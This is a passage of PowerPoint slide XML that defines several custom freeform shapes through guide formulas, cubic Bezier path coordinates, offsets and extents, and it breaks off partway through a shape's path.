                <a:gd name="connsiteY3" fmla="*/ 162614 h 938681"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 996517"/>
                <a:gd name="connsiteY4" fmla="*/ 77198 h 938681"/>
                <a:gd name="connsiteX5" fmla="*/ 59510 w 996517"/>
                <a:gd name="connsiteY5" fmla="*/ 26416 h 938681"/>
                <a:gd name="connsiteX6" fmla="*/ 152896 w 996517"/>
                <a:gd name="connsiteY6" fmla="*/ 7450 h 938681"/>
                <a:gd name="connsiteX7" fmla="*/ 317818 w 996517"/>
                <a:gd name="connsiteY7" fmla="*/ 109702 h 938681"/>
                <a:gd name="connsiteX8" fmla="*/ 802001 w 996517"/>
                <a:gd name="connsiteY8" fmla="*/ 583921 h 938681"/>
                <a:gd name="connsiteX9" fmla="*/ 944590 w 996517"/>
                <a:gd name="connsiteY9" fmla="*/ 750011 h 938681"/>
                <a:gd name="connsiteX10" fmla="*/ 993929 w 996517"/>
                <a:gd name="connsiteY10" fmla="*/ 858172 h 938681"/>
                <a:gd name="connsiteX11" fmla="*/ 924181 w 996517"/>
                <a:gd name="connsiteY11" fmla="*/ 938297 h 938681"/>
                <a:gd name="connsiteX12" fmla="*/ 836704 w 996517"/>
                <a:gd name="connsiteY12" fmla="*/ 910673 h 938681"/>
                <a:gd name="connsiteX13" fmla="*/ 643745 w 996517"/>
                <a:gd name="connsiteY13" fmla="*/ 772207 h 93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6517" h="938681">
                  <a:moveTo>
                    <a:pt x="643745" y="772207"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="672056" y="746850"/>
                    <a:pt x="673362" y="717851"/>
                    <a:pt x="656252" y="685691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="617014" y="612232"/>
                    <a:pt x="561147" y="551624"/>
                    <a:pt x="505348" y="491152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398286" y="375089"/>
                    <a:pt x="283253" y="267134"/>
                    <a:pt x="164922" y="162614"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116613" y="119941"/>
                    <a:pt x="63288" y="89567"/>
                    <a:pt x="0" y="77198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19997" y="60431"/>
                    <a:pt x="42261" y="45657"/>
                    <a:pt x="59510" y="26416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86997" y="-4094"/>
                    <a:pt x="118056" y="-4850"/>
                    <a:pt x="152896" y="7450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215360" y="29440"/>
                    <a:pt x="267311" y="68746"/>
                    <a:pt x="317818" y="109702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493941" y="252703"/>
                    <a:pt x="647524" y="418793"/>
                    <a:pt x="802001" y="583921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="851890" y="637246"/>
                    <a:pt x="904459" y="688303"/>
                    <a:pt x="944590" y="750011"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="966442" y="783614"/>
                    <a:pt x="985545" y="818453"/>
                    <a:pt x="993929" y="858172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1005268" y="912253"/>
                    <a:pt x="978880" y="942488"/>
                    <a:pt x="924181" y="938297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="892845" y="935892"/>
                    <a:pt x="864191" y="924828"/>
                    <a:pt x="836704" y="910673"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765649" y="873977"/>
                    <a:pt x="698994" y="830960"/>
                    <a:pt x="643745" y="77220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8CB82D-D584-4924-BFD3-93E2562EFFCD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7940169" y="6079637"/>
              <a:ext cx="845832" cy="514006"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 845832"/>
                <a:gd name="connsiteY0" fmla="*/ 179353 h 514006"/>
                <a:gd name="connsiteX1" fmla="*/ 24876 w 845832"/>
                <a:gd name="connsiteY1" fmla="*/ 54974 h 514006"/>
                <a:gd name="connsiteX2" fmla="*/ 71466 w 845832"/>
                <a:gd name="connsiteY2" fmla="*/ 19310 h 514006"/>
                <a:gd name="connsiteX3" fmla="*/ 454772 w 845832"/>
                <a:gd name="connsiteY3" fmla="*/ 3986 h 514006"/>
                <a:gd name="connsiteX4" fmla="*/ 478136 w 845832"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 514006"/>
                <a:gd name="connsiteX5" fmla="*/ 502875 w 845832"/>
                <a:gd name="connsiteY5" fmla="*/ 16973 h 514006"/>
                <a:gd name="connsiteX6" fmla="*/ 703185 w 845832"/>
                <a:gd name="connsiteY6" fmla="*/ 237969 h 514006"/>
                <a:gd name="connsiteX7" fmla="*/ 833337 w 845832"/>
                <a:gd name="connsiteY7" fmla="*/ 422406 h 514006"/>
                <a:gd name="connsiteX8" fmla="*/ 818837 w 845832"/>
                <a:gd name="connsiteY8" fmla="*/ 514007 h 514006"/>
                <a:gd name="connsiteX9" fmla="*/ 690610 w 845832"/>
                <a:gd name="connsiteY9" fmla="*/ 424399 h 514006"/>
                <a:gd name="connsiteX10" fmla="*/ 321667 w 845832"/>
                <a:gd name="connsiteY10" fmla="*/ 265112 h 514006"/>
                <a:gd name="connsiteX11" fmla="*/ 50095 w 845832"/>
                <a:gd name="connsiteY11" fmla="*/ 188424 h 514006"/>
                <a:gd name="connsiteX12" fmla="*/ 0 w 845832"/>
                <a:gd name="connsiteY12" fmla="*/ 179353 h 51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5832" h="514006">
                  <a:moveTo>
                    <a:pt x="0" y="179353"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11339" y="138535"/>
                    <a:pt x="23295" y="97785"/>
                    <a:pt x="24876" y="54974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25357" y="23295"/>
                    <a:pt x="43635" y="19104"/>
                    <a:pt x="71466" y="19310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199418" y="20203"/>
                    <a:pt x="327301" y="15874"/>
                    <a:pt x="454772" y="3986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="462605" y="3230"/>
                    <a:pt x="470371" y="1306"/>
                    <a:pt x="478136" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489681" y="825"/>
                    <a:pt x="495796" y="9689"/>
                    <a:pt x="502875" y="16973"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="572073" y="88439"/>
                    <a:pt x="639690" y="161349"/>
                    <a:pt x="703185" y="237969"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="751287" y="296035"/>
                    <a:pt x="799527" y="354239"/>
                    <a:pt x="833337" y="422406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="853539" y="463224"/>
                    <a:pt x="849623" y="483565"/>
                    <a:pt x="818837" y="514007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="774583" y="486313"/>
                    <a:pt x="735345" y="451886"/>
                    <a:pt x="690610" y="424399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="575097" y="353208"/>
                    <a:pt x="448725" y="308816"/>
                    <a:pt x="321667" y="265112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232608" y="234464"/>
                    <a:pt x="141351" y="211581"/>
                    <a:pt x="50095" y="188424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33672" y="184300"/>
                    <a:pt x="16699" y="182376"/>
                    <a:pt x="0" y="179353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EC1B4F8-235E-46A6-B61E-EAE2F3ECA6D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8409729" y="5963024"/>
              <a:ext cx="696495" cy="811007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 349209 w 696495"/>
                <a:gd name="connsiteY0" fmla="*/ 630688 h 811007"/>
                <a:gd name="connsiteX1" fmla="*/ 363708 w 696495"/>
                <a:gd name="connsiteY1" fmla="*/ 539088 h 811007"/>
                <a:gd name="connsiteX2" fmla="*/ 233557 w 696495"/>
                <a:gd name="connsiteY2" fmla="*/ 354651 h 811007"/>
                <a:gd name="connsiteX3" fmla="*/ 33246 w 696495"/>
                <a:gd name="connsiteY3" fmla="*/ 133656 h 811007"/>
                <a:gd name="connsiteX4" fmla="*/ 8507 w 696495"/>
                <a:gd name="connsiteY4" fmla="*/ 116682 h 811007"/>
                <a:gd name="connsiteX5" fmla="*/ 3904 w 696495"/>
                <a:gd name="connsiteY5" fmla="*/ 108642 h 811007"/>
                <a:gd name="connsiteX6" fmla="*/ 50219 w 696495"/>
                <a:gd name="connsiteY6" fmla="*/ 105619 h 811007"/>
                <a:gd name="connsiteX7" fmla="*/ 69597 w 696495"/>
                <a:gd name="connsiteY7" fmla="*/ 31541 h 811007"/>
                <a:gd name="connsiteX8" fmla="*/ 73171 w 696495"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 811007"/>
                <a:gd name="connsiteX9" fmla="*/ 117975 w 696495"/>
                <a:gd name="connsiteY9" fmla="*/ 11201 h 811007"/>
                <a:gd name="connsiteX10" fmla="*/ 580855 w 696495"/>
                <a:gd name="connsiteY10" fmla="*/ 525139 h 811007"/>
                <a:gd name="connsiteX11" fmla="*/ 669088 w 696495"/>
                <a:gd name="connsiteY11" fmla="*/ 654946 h 811007"/>
                <a:gd name="connsiteX12" fmla="*/ 692865 w 696495"/>
                <a:gd name="connsiteY12" fmla="*/ 718715 h 811007"/>
                <a:gd name="connsiteX13" fmla="*/ 598790 w 696495"/>
                <a:gd name="connsiteY13" fmla="*/ 804200 h 811007"/>
                <a:gd name="connsiteX14" fmla="*/ 397242 w 696495"/>
                <a:gd name="connsiteY14" fmla="*/ 678172 h 811007"/>
                <a:gd name="connsiteX15" fmla="*/ 349209 w 696495"/>
                <a:gd name="connsiteY15" fmla="*/ 630688 h 81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6495" h="811007">
                  <a:moveTo>
                    <a:pt x="349209" y="630688"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="379994" y="600315"/>
                    <a:pt x="383911" y="579907"/>
                    <a:pt x="363708" y="539088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329968" y="470920"/>
                    <a:pt x="281728" y="412786"/>
                    <a:pt x="233557" y="354651"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170062" y="278030"/>
                    <a:pt x="102444" y="205121"/>
                    <a:pt x="33246" y="133656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26237" y="126371"/>
                    <a:pt x="20052" y="117507"/>
                    <a:pt x="8507" y="116682"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8645" y="112696"/>
                    <a:pt x="-7091" y="112696"/>
                    <a:pt x="3904" y="108642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18265" y="103351"/>
                    <a:pt x="39018" y="124722"/>
                    <a:pt x="50219" y="105619"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63069" y="83698"/>
                    <a:pt x="69735" y="58341"/>
                    <a:pt x="69597" y="31541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69528" y="21509"/>
                    <a:pt x="59702" y="8864"/>
                    <a:pt x="73171" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85403" y="14637"/>
                    <a:pt x="104918" y="69"/>
                    <a:pt x="117975" y="11201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282278" y="173512"/>
                    <a:pt x="431807" y="349085"/>
                    <a:pt x="580855" y="525139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="614871" y="565339"/>
                    <a:pt x="646343" y="607325"/>
                    <a:pt x="669088" y="654946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="678846" y="675355"/>
                    <a:pt x="688123" y="696726"/>
                    <a:pt x="692865" y="718715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="708738" y="792862"/>
                    <a:pt x="671699" y="826533"/>
                    <a:pt x="598790" y="804200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="520659" y="780218"/>
                    <a:pt x="457988" y="730260"/>
                    <a:pt x="397242" y="678172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380269" y="663673"/>
                    <a:pt x="359723" y="652060"/>
                    <a:pt x="349209" y="6306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6E2957-9BD3-4229-9841-125ADD06F385}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4993127" y="1894194"/>
              <a:ext cx="3690953" cy="1171650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1474909 w 3690953"/>
                <a:gd name="connsiteY0" fmla="*/ 1156035 h 1171650"/>
                <a:gd name="connsiteX1" fmla="*/ 945235 w 3690953"/>
                <a:gd name="connsiteY1" fmla="*/ 1139612 h 1171650"/>
                <a:gd name="connsiteX2" fmla="*/ 624668 w 3690953"/>
                <a:gd name="connsiteY2" fmla="*/ 1135832 h 1171650"/>
                <a:gd name="connsiteX3" fmla="*/ 560142 w 3690953"/>
                <a:gd name="connsiteY3" fmla="*/ 1141811 h 1171650"/>
                <a:gd name="connsiteX4" fmla="*/ 399275 w 3690953"/>
                <a:gd name="connsiteY4" fmla="*/ 1144010 h 1171650"/>
                <a:gd name="connsiteX5" fmla="*/ 149968 w 3690953"/>
                <a:gd name="connsiteY5" fmla="*/ 1083057 h 1171650"/>
                <a:gd name="connsiteX6" fmla="*/ 54176 w 3690953"/>
                <a:gd name="connsiteY6" fmla="*/ 1045881 h 1171650"/>
                <a:gd name="connsiteX7" fmla="*/ 22222 w 3690953"/>
                <a:gd name="connsiteY7" fmla="*/ 1014202 h 1171650"/>
                <a:gd name="connsiteX8" fmla="*/ 13495 w 3690953"/>
                <a:gd name="connsiteY8" fmla="*/ 863574 h 1171650"/>
                <a:gd name="connsiteX9" fmla="*/ 57337 w 3690953"/>
                <a:gd name="connsiteY9" fmla="*/ 833544 h 1171650"/>
                <a:gd name="connsiteX10" fmla="*/ 401061 w 3690953"/>
                <a:gd name="connsiteY10" fmla="*/ 826054 h 1171650"/>
                <a:gd name="connsiteX11" fmla="*/ 469298 w 3690953"/>
                <a:gd name="connsiteY11" fmla="*/ 830108 h 1171650"/>
                <a:gd name="connsiteX12" fmla="*/ 487233 w 3690953"/>
                <a:gd name="connsiteY12" fmla="*/ 789496 h 1171650"/>
                <a:gd name="connsiteX13" fmla="*/ 455417 w 3690953"/>
                <a:gd name="connsiteY13" fmla="*/ 651306 h 1171650"/>
                <a:gd name="connsiteX14" fmla="*/ 463663 w 3690953"/>
                <a:gd name="connsiteY14" fmla="*/ 646221 h 1171650"/>
                <a:gd name="connsiteX15" fmla="*/ 643497 w 3690953"/>
                <a:gd name="connsiteY15" fmla="*/ 756993 h 1171650"/>
                <a:gd name="connsiteX16" fmla="*/ 793438 w 3690953"/>
                <a:gd name="connsiteY16" fmla="*/ 858145 h 1171650"/>
                <a:gd name="connsiteX17" fmla="*/ 832194 w 3690953"/>
                <a:gd name="connsiteY17" fmla="*/ 866322 h 1171650"/>
                <a:gd name="connsiteX18" fmla="*/ 1150356 w 3690953"/>
                <a:gd name="connsiteY18" fmla="*/ 803721 h 1171650"/>
                <a:gd name="connsiteX19" fmla="*/ 1460410 w 3690953"/>
                <a:gd name="connsiteY19" fmla="*/ 755069 h 1171650"/>
                <a:gd name="connsiteX20" fmla="*/ 1768745 w 3690953"/>
                <a:gd name="connsiteY20" fmla="*/ 716312 h 1171650"/>
                <a:gd name="connsiteX21" fmla="*/ 2093435 w 3690953"/>
                <a:gd name="connsiteY21" fmla="*/ 705798 h 1171650"/>
                <a:gd name="connsiteX22" fmla="*/ 2353461 w 3690953"/>
                <a:gd name="connsiteY22" fmla="*/ 629453 h 1171650"/>
                <a:gd name="connsiteX23" fmla="*/ 2777104 w 3690953"/>
                <a:gd name="connsiteY23" fmla="*/ 336168 h 1171650"/>
                <a:gd name="connsiteX24" fmla="*/ 3268777 w 3690953"/>
                <a:gd name="connsiteY24" fmla="*/ 37247 h 1171650"/>
                <a:gd name="connsiteX25" fmla="*/ 3480840 w 3690953"/>
                <a:gd name="connsiteY25" fmla="*/ 9485 h 1171650"/>
                <a:gd name="connsiteX26" fmla="*/ 3648854 w 3690953"/>
                <a:gd name="connsiteY26" fmla="*/ 185745 h 1171650"/>
                <a:gd name="connsiteX27" fmla="*/ 3688984 w 3690953"/>
                <a:gd name="connsiteY27" fmla="*/ 340634 h 1171650"/>
                <a:gd name="connsiteX28" fmla="*/ 3655657 w 3690953"/>
                <a:gd name="connsiteY28" fmla="*/ 487758 h 1171650"/>
                <a:gd name="connsiteX29" fmla="*/ 3417345 w 3690953"/>
                <a:gd name="connsiteY29" fmla="*/ 717343 h 1171650"/>
                <a:gd name="connsiteX30" fmla="*/ 2782808 w 3690953"/>
                <a:gd name="connsiteY30" fmla="*/ 1007399 h 1171650"/>
                <a:gd name="connsiteX31" fmla="*/ 2433860 w 3690953"/>
                <a:gd name="connsiteY31" fmla="*/ 1113362 h 1171650"/>
                <a:gd name="connsiteX32" fmla="*/ 1916075 w 3690953"/>
                <a:gd name="connsiteY32" fmla="*/ 1169573 h 1171650"/>
                <a:gd name="connsiteX33" fmla="*/ 1474909 w 3690953"/>
                <a:gd name="connsiteY33" fmla="*/ 1156035 h 11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90953" h="1171650">
                  <a:moveTo>
                    <a:pt x="1474909" y="1156035"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1298305" y="1150950"/>
                    <a:pt x="1121563" y="1149370"/>
                    <a:pt x="945235" y="1139612"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="838242" y="1133702"/>
                    <a:pt x="731592" y="1130541"/>
                    <a:pt x="624668" y="1135832"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="603091" y="1136863"/>
                    <a:pt x="581651" y="1139749"/>
                    <a:pt x="560142" y="1141811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="506405" y="1142017"/>
                    <a:pt x="451500" y="1135076"/>
                    <a:pt x="399275" y="1144010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305407" y="1160021"/>
                    <a:pt x="228993" y="1120302"/>
                    <a:pt x="149968" y="1083057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119045" y="1068489"/>
                    <a:pt x="86541" y="1057082"/>
                    <a:pt x="54176" y="1045881"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37477" y="1040109"/>
                    <a:pt x="31293" y="1027740"/>
                    <a:pt x="22222" y="1014202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-10556" y="965001"/>
                    <a:pt x="-1348" y="913737"/>
                    <a:pt x="13495" y="863574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17824" y="849074"/>
                    <a:pt x="30674" y="836705"/>
                    <a:pt x="57337" y="833544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172095" y="819869"/>
                    <a:pt x="286715" y="832445"/>
                    <a:pt x="401061" y="826054"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424013" y="824749"/>
                    <a:pt x="443116" y="840485"/>
                    <a:pt x="469298" y="830108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495135" y="819869"/>
                    <a:pt x="494654" y="807088"/>
                    <a:pt x="487233" y="789496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="468473" y="745174"/>
                    <a:pt x="468130" y="696865"/>
                    <a:pt x="455417" y="651306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455142" y="650412"/>
                    <a:pt x="460777" y="647938"/>
                    <a:pt x="463663" y="646221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="527983" y="676044"/>
                    <a:pt x="584675" y="718237"/>
                    <a:pt x="643497" y="756993"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="693797" y="790184"/>
                    <a:pt x="743961" y="823649"/>
                    <a:pt x="793438" y="858145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="806013" y="866941"/>
                    <a:pt x="818726" y="869690"/>
                    <a:pt x="832194" y="866322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="937126" y="839660"/>
                    <a:pt x="1043982" y="822137"/>
                    <a:pt x="1150356" y="803721"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253364" y="785854"/>
                    <a:pt x="1356784" y="769775"/>
                    <a:pt x="1460410" y="755069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1563073" y="740501"/>
                    <a:pt x="1666012" y="729643"/>
                    <a:pt x="1768745" y="716312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1877181" y="715007"/>
                    <a:pt x="1986166" y="690956"/>
                    <a:pt x="2093435" y="705798"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2195617" y="719954"/>
                    <a:pt x="2274505" y="681198"/>
                    <a:pt x="2353461" y="629453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2497150" y="535242"/>
                    <a:pt x="2635752" y="433746"/>
                    <a:pt x="2777104" y="336168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2935223" y="227044"/>
                    <a:pt x="3093411" y="117852"/>
                    <a:pt x="3268777" y="37247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3336052" y="6324"/>
                    <a:pt x="3406969" y="-12367"/>
                    <a:pt x="3480840" y="9485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3569622" y="35735"/>
                    <a:pt x="3615732" y="105346"/>
                    <a:pt x="3648854" y="185745"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3669331" y="235428"/>
                    <a:pt x="3681219" y="287997"/>
                    <a:pt x="3688984" y="340634"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3696612" y="392516"/>
                    <a:pt x="3681357" y="441786"/>
                    <a:pt x="3655657" y="487758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3599377" y="588429"/>
                    <a:pt x="3511488" y="656322"/>
                    <a:pt x="3417345" y="717343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3220125" y="845226"/>
                    <a:pt x="3003597" y="930642"/>
                    <a:pt x="2782808" y="1007399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2667775" y="1047324"/>
                    <a:pt x="2550680" y="1079828"/>
                    <a:pt x="2433860" y="1113362"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2264610" y="1162014"/>
                    <a:pt x="2091717" y="1177819"/>
                    <a:pt x="1916075" y="1169573"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1866873" y="1167030"/>
                    <a:pt x="1572831" y="1158853"/>
                    <a:pt x="1474909" y="1156035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9D77AA-E2AB-4CC6-B58A-541C25898677}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7146071" y="636221"/>
              <a:ext cx="880602" cy="972241"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 879240 w 880602"/>
                <a:gd name="connsiteY0" fmla="*/ 902362 h 972241"/>
                <a:gd name="connsiteX1" fmla="*/ 837116 w 880602"/>
                <a:gd name="connsiteY1" fmla="*/ 964552 h 972241"/>
                <a:gd name="connsiteX2" fmla="*/ 666147 w 880602"/>
                <a:gd name="connsiteY2" fmla="*/ 942356 h 972241"/>
                <a:gd name="connsiteX3" fmla="*/ 636117 w 880602"/>
                <a:gd name="connsiteY3" fmla="*/ 902637 h 972241"/>
                <a:gd name="connsiteX4" fmla="*/ 616602 w 880602"/>
                <a:gd name="connsiteY4" fmla="*/ 820314 h 972241"/>
                <a:gd name="connsiteX5" fmla="*/ 559910 w 880602"/>
                <a:gd name="connsiteY5" fmla="*/ 595333 h 972241"/>
                <a:gd name="connsiteX6" fmla="*/ 529056 w 880602"/>
                <a:gd name="connsiteY6" fmla="*/ 582345 h 972241"/>
                <a:gd name="connsiteX7" fmla="*/ 455872 w 880602"/>
                <a:gd name="connsiteY7" fmla="*/ 618972 h 972241"/>
                <a:gd name="connsiteX8" fmla="*/ 347367 w 880602"/>
                <a:gd name="connsiteY8" fmla="*/ 610588 h 972241"/>
                <a:gd name="connsiteX9" fmla="*/ 106718 w 880602"/>
                <a:gd name="connsiteY9" fmla="*/ 405879 h 972241"/>
                <a:gd name="connsiteX10" fmla="*/ 34771 w 880602"/>
                <a:gd name="connsiteY10" fmla="*/ 208522 h 972241"/>
                <a:gd name="connsiteX11" fmla="*/ 0 w 880602"/>
                <a:gd name="connsiteY11" fmla="*/ 81601 h 972241"/>
                <a:gd name="connsiteX12" fmla="*/ 592482 w 880602"/>
                <a:gd name="connsiteY12" fmla="*/ 4638 h 972241"/>
                <a:gd name="connsiteX13" fmla="*/ 671438 w 880602"/>
                <a:gd name="connsiteY13" fmla="*/ 36591 h 972241"/>
                <a:gd name="connsiteX14" fmla="*/ 710676 w 880602"/>
                <a:gd name="connsiteY14" fmla="*/ 247691 h 972241"/>
                <a:gd name="connsiteX15" fmla="*/ 696108 w 880602"/>
                <a:gd name="connsiteY15" fmla="*/ 530807 h 972241"/>
                <a:gd name="connsiteX16" fmla="*/ 845843 w 880602"/>
                <a:gd name="connsiteY16" fmla="*/ 859345 h 972241"/>
                <a:gd name="connsiteX17" fmla="*/ 879240 w 880602"/>
                <a:gd name="connsiteY17" fmla="*/ 902362 h 97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0602" h="972241">
                  <a:moveTo>
                    <a:pt x="879240" y="902362"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="885562" y="936858"/>
                    <a:pt x="869619" y="955275"/>
                    <a:pt x="837116" y="964552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="776644" y="981868"/>
                    <a:pt x="720503" y="967987"/>
                    <a:pt x="666147" y="942356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="650342" y="934934"/>
                    <a:pt x="640653" y="919542"/>
                    <a:pt x="636117" y="902637"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="628833" y="875425"/>
                    <a:pt x="622992" y="847801"/>
                    <a:pt x="616602" y="820314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="597567" y="745343"/>
                    <a:pt x="577639" y="670647"/>
                    <a:pt x="559910" y="595333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="554619" y="572793"/>
                    <a:pt x="548090" y="570801"/>
                    <a:pt x="529056" y="582345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="505761" y="596432"/>
                    <a:pt x="480335" y="606877"/>
                    <a:pt x="455872" y="618972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418008" y="637594"/>
                    <a:pt x="383856" y="635533"/>
                    <a:pt x="347367" y="610588"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259752" y="550735"/>
                    <a:pt x="167670" y="496861"/>
                    <a:pt x="106718" y="405879"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89745" y="337505"/>
                    <a:pt x="54149" y="275934"/>
                    <a:pt x="34771" y="208522"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22677" y="166330"/>
                    <a:pt x="3573" y="126061"/>
                    <a:pt x="0" y="81601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201755" y="88542"/>
                    <a:pt x="397462" y="49235"/>
                    <a:pt x="592482" y="4638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="635980" y="-5326"/>
                    <a:pt x="648143" y="-1203"/>
                    <a:pt x="671438" y="36591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711707" y="101873"/>
                    <a:pt x="719952" y="173133"/>
                    <a:pt x="710676" y="247691"/>
